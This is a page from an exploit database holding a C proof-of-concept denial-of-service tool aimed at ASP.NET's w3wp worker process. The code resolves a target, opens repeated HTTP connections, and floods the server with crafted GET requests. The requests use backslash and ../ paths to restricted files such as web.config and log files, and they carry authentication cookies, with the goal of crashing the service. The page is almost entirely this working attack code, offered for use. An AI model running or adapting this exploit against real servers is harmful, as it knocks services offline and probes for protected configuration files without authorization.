[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ASP.NET w3wp (COM Components) Remote Crash Exploit

Author
Debasis Mohanty
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6113
Category
dos / poc
Date add
22-03-2006
Platform
unsorted
==================================================
ASP.NET w3wp (COM Components) Remote Crash Exploit
==================================================



// w3wp-dos.c
//

#include "stdafx.h"

#pragma comment (lib,"ws2_32")

#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>

char * pszUnauthLinks(DWORD);

#define portno	80

int main(int argc, CHAR* argv[])
{
	char	szWorkBuff[100];
	DWORD	dwCount = 0, dwCounter;
	int	iCnt = 0, iCount = 0;

	SOCKET	conn_socket; 
	WSADATA wsaData;
	struct	sockaddr_in sin;
	struct	hostent *phostent;
	char	*pszTargetHost = new char[MAX_PATH]; 
	UINT	uAddr; 

	if (argc<2)
	{
		printf("============================================\n");
		printf("\t\t w3wp-dos by Debasis Mohanty\n");
		printf("\t\t www.hackingspirits.com\n");
		printf("============================================\n");

		printf("\nUsage: w3wpdos <HostIP / HostName> \n\n");

		exit(0);
	}

	int iRetval; 
	if((iRetval = WSAStartup(0x202,&wsaData)) != 0) {
		printf( "WSAStartup failed with error %d\n",iRetval);
		WSACleanup(); exit(1); }

	// Make a check on the length of the parameter provided
	if (strlen(argv[1]) > MAX_PATH)	{ 
		printf( "Too long parameter ....\n"); exit(1); }
	else
		strcpy(pszTargetHost, argv[1]);

	// Resolve the hostname into IP address or vice-versa
	if(isalpha(pszTargetHost[0])) 
		phostent = gethostbyname(pszTargetHost);
	else  { 
		uAddr = inet_addr(pszTargetHost);
		phostent = gethostbyaddr((char *)&uAddr,4,AF_INET);

		if(phostent != NULL)
			wsprintf( pszTargetHost, "[+] %s", phostent->h_name);
		else	{
			printf( "Failed to resolve IP address, please provide host name.\n" );
			WSACleanup();
			exit(1);	
		}
	}

	if (phostent == NULL )	{
		printf("Cannot resolve address [%s]: Error %d\n", pszTargetHost, 
			WSAGetLastError());

		WSACleanup();
		printf( "Target host seems to be down or the program failed to resolve host name.");
		printf( "Press enter to exit" );

		getchar();
		exit(1); }

	// Initialise Socket info
	memset(&sin,0,sizeof(sin));
	memcpy(&(sin.sin_addr),phostent->h_addr,phostent->h_length);
	sin.sin_family = phostent->h_addrtype;
	sin.sin_port = htons(portno);

	conn_socket = socket(AF_INET, SOCK_STREAM, 0); 
	if (conn_socket < 0 )	{
		printf("Error Opening socket: Error %d\n", WSAGetLastError());
		WSACleanup();

		return -1;}

	printf("============================================\n");
	printf("\t\t w3wp-dos by Debasis Mohanty\n");
	printf("\t\t www.hackingspirits.com\n");
	printf("============================================\n");

	printf("[+] Host name: %s\n", pszTargetHost);
	wsprintf( szWorkBuff, "%u.%u.%u.%u", 
		sin.sin_addr.S_un.S_un_b.s_b1,
		sin.sin_addr.S_un.S_un_b.s_b2,
		sin.sin_addr.S_un.S_un_b.s_b3,
		sin.sin_addr.S_un.S_un_b.s_b4 );
	printf("[+] Host IP: %s\n", szWorkBuff);

	closesocket(conn_socket);

	printf("[+] Ready to generate requests\n");

	/* The count should be modified depending upon the 
	number of links in the szBuff array	*/
	while(dwCount++ < 10) 
	{						

		conn_socket = socket(AF_INET, SOCK_STREAM, 0);
		memcpy(phostent->h_addr, (char *)&sin.sin_addr, phostent->h_length);
		sin.sin_family = AF_INET;
		sin.sin_port = htons(portno);

		if(connect(conn_socket, (struct sockaddr*)&sin,sizeof(sin))!=0)
			perror("connect");

		printf( "[%i] %s", dwCount, pszUnauthLinks(dwCount));
		for(dwCounter=1;dwCounter < 9;dwCounter++) 
		{
			send(conn_socket,pszUnauthLinks(dwCount), strlen(pszUnauthLinks(dwCount)),0);

			char *szBuffer = new char[256];
			recv(conn_socket, szBuffer, 256, 0);
			printf(".");
			// 			if( szBuffer != NULL) 
			//				printf("%s", szBuffer);
			delete szBuffer;
			Sleep(100);
		}
		printf("\n");
		closesocket(conn_socket);
	}

	return 1;
}


char * pszUnauthLinks( DWORD dwIndex )
{
	char	*szBuff[10];
	TCHAR	*szGetReqH = new char[1024]; 

	/*	Modify the list of links given below to your asp.net links. The list should carry links which refer to any COM components and as well as other restricted links under the asp.net app path. 	*/

	szBuff[1] = "GET /aspnet-app\\web.config";
	szBuff[2] = "GET /aspnet-app\\../aspnetlogs\\log1.logs";
	szBuff[3] = "GET /aspnet-app\\default-userscreen.aspx";
	szBuff[4] = "GET /aspnet-app\\users/config.aspx";
	szBuff[5] = "GET /aspnet-app\\links/anycomref.aspx";	//
	szBuff[6] = "GET /aspnet-app\\com-ref-link1.aspx";		// Links of pages referring 
	szBuff[7] = "GET /aspnet-app\\com-ref-link2.aspx";		// COM components.
	szBuff[8] = "GET /aspnet-app\\com-ref-link3.aspx";		//
	szBuff[9] = "GET /aspnet-app\\com-ref-link4.aspx";		//

	/* Prepare the GET request for the desired link */
	strcpy(szGetReqH, szBuff[dwIndex]);
	strcat(szGetReqH, " HTTP/1.1\r\n");
	strcat(szGetReqH, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");
	strcat(szGetReqH, "Accept-Language: en-us\r\n");
	strcat(szGetReqH, "Accept-Encoding: gzip, deflate\r\n");
	strcat(szGetReqH, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\n");
	strcat(szGetReqH, "Host: \r\n" );
	strcat(szGetReqH, "Connection: Keep-Alive\r\n" );

	/* Insert a valid Session Cookie and ASPVIEWSTATE to get more effective result */
	strcat(szGetReqH, "Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;\r\n" );
	strcat(szGetReqH, ".ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D733518A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D\r\n\r\n" );

	// return szBuff[dwIndex];
	return szGetReqH;
}



#  0day.today [2024-12-25]  #